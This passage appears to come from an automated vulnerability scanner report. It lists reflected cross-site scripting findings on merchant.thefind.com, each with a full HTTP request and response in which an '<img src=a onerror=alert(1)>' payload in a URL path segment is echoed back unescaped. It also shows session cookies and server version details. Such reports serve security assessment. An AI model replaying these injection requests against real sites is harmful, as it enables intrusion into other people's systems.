This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scriptse817d<img%20src%3da%20onerror%3dalert(1)>6ecec1b0e72/mc/claim_store.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 214
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"claim_store","fullname":"scriptse817d<img src=a onerror=alert(1)>6ecec1b0e72.mc.claim_store","path":".","type":"missing","components":null,"payload":""}}

1.40. https://merchant.thefind.com/scripts/mc/claim_store.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/claim_store.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10d3b<img%20src%3da%20onerror%3dalert(1)>a6546801276 was submitted in the REST URL parameter 2. This input was echoed as 10d3b<img src=a onerror=alert(1)>a6546801276 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc10d3b<img%20src%3da%20onerror%3dalert(1)>a6546801276/claim_store.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:24 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 214
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"claim_store","fullname":"scripts.mc10d3b<img src=a onerror=alert(1)>a6546801276.claim_store","path":".","type":"missing","components":null,"payload":""}}

1.41. https://merchant.thefind.com/scripts/mc/claim_store.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/claim_store.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7a9c2<img%20src%3da%20onerror%3dalert(1)>059214fd8c3 was submitted in the REST URL parameter 3. This input was echoed as 7a9c2<img src=a onerror=alert(1)>059214fd8c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc/7a9c2<img%20src%3da%20onerror%3dalert(1)>059214fd8c3 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:14 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.mc.7a9c2<img src=a onerror=alert(1)>059214fd8c3]
</div>
...[SNIP]...

1.42. https://merchant.thefind.com/scripts/mc/init.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/init.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46cbb<img%20src%3da%20onerror%3dalert(1)>c032860338b was submitted in the REST URL parameter 1. This input was echoed as 46cbb<img src=a onerror=alert(1)>c032860338b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts46cbb<img%20src%3da%20onerror%3dalert(1)>c032860338b/mc/init.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:35 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 200
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"init","fullname":"scripts46cbb<img src=a onerror=alert(1)>c032860338b.mc.init","path":".","type":"missing","components":null,"payload":""}}

1.43. https://merchant.thefind.com/scripts/mc/init.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/init.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6a988<img%20src%3da%20onerror%3dalert(1)>de641cf5a06 was submitted in the REST URL parameter 2. This input was echoed as 6a988<img src=a onerror=alert(1)>de641cf5a06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc6a988<img%20src%3da%20onerror%3dalert(1)>de641cf5a06/init.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:54 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 200
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"init","fullname":"scripts.mc6a988<img src=a onerror=alert(1)>de641cf5a06.init","path":".","type":"missing","components":null,"payload":""}}

1.44. https://merchant.thefind.com/scripts/mc/init.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/init.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0afe<img%20src%3da%20onerror%3dalert(1)>a93f4168af0 was submitted in the REST URL parameter 3. This input was echoed as c0afe<img src=a onerror=alert(1)>a93f4168af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc/c0afe<img%20src%3da%20onerror%3dalert(1)>a93f4168af0 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:45 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.mc.c0afe<img src=a onerror=alert(1)>a93f4168af0]
</div>
...[SNIP]...

1.45. https://merchant.thefind.com/scripts/mc/mc_common.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/mc_common.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38646<img%20src%3da%20onerror%3dalert(1)>96ace1d9e46 was submitted in the REST URL parameter 1. This input was echoed as 38646<img src=a onerror=alert(1)>96ace1d9e46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts38646<img%20src%3da%20onerror%3dalert(1)>96ace1d9e46/mc/mc_common.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:16 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 210
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"mc_common","fullname":"scripts38646<img src=a onerror=alert(1)>96ace1d9e46.mc.mc_common","path":".","type":"missing","components":null,"payload":""}}

1.46. https://merchant.thefind.com/scripts/mc/mc_common.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/mc_common.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8007d<img%20src%3da%20onerror%3dalert(1)>4dd96d931ba was submitted in the REST URL parameter 2. This input was echoed as 8007d<img src=a onerror=alert(1)>4dd96d931ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc8007d<img%20src%3da%20onerror%3dalert(1)>4dd96d931ba/mc_common.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:06 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 210
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"mc_common","fullname":"scripts.mc8007d<img src=a onerror=alert(1)>4dd96d931ba.mc_common","path":".","type":"missing","components":null,"payload":""}}

1.47. https://merchant.thefind.com/scripts/mc/mc_common.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/mc_common.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2fd9<img%20src%3da%20onerror%3dalert(1)>b72323810de was submitted in the REST URL parameter 3. This input was echoed as b2fd9<img src=a onerror=alert(1)>b72323810de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc/b2fd9<img%20src%3da%20onerror%3dalert(1)>b72323810de HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:58 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.mc.b2fd9<img src=a onerror=alert(1)>b72323810de]
</div>
...[SNIP]...

1.48. https://merchant.thefind.com/scripts/mc/mc_utils.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/mc_utils.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 287f6<img%20src%3da%20onerror%3dalert(1)>1740dd2feef was submitted in the REST URL parameter 1. This input was echoed as 287f6<img src=a onerror=alert(1)>1740dd2feef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts287f6<img%20src%3da%20onerror%3dalert(1)>1740dd2feef/mc/mc_utils.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:14 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 208
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"mc_utils","fullname":"scripts287f6<img src=a onerror=alert(1)>1740dd2feef.mc.mc_utils","path":".","type":"missing","components":null,"payload":""}}

1.49. https://merchant.thefind.com/scripts/mc/mc_utils.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/mc_utils.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f040<img%20src%3da%20onerror%3dalert(1)>e021a673743 was submitted in the REST URL parameter 2. This input was echoed as 5f040<img src=a onerror=alert(1)>e021a673743 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc5f040<img%20src%3da%20onerror%3dalert(1)>e021a673743/mc_utils.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:05 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 208
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"mc_utils","fullname":"scripts.mc5f040<img src=a onerror=alert(1)>e021a673743.mc_utils","path":".","type":"missing","components":null,"payload":""}}

1.50. https://merchant.thefind.com/scripts/mc/mc_utils.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/mc_utils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64d22<img%20src%3da%20onerror%3dalert(1)>fc3993f393e was submitted in the REST URL parameter 3. This input was echoed as 64d22<img src=a onerror=alert(1)>fc3993f393e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc/64d22<img%20src%3da%20onerror%3dalert(1)>fc3993f393e HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:56 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.mc.64d22<img src=a onerror=alert(1)>fc3993f393e]
</div>
...[SNIP]...

1.51. https://merchant.thefind.com/scripts/mc/prototype.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/prototype.js

Issue detail

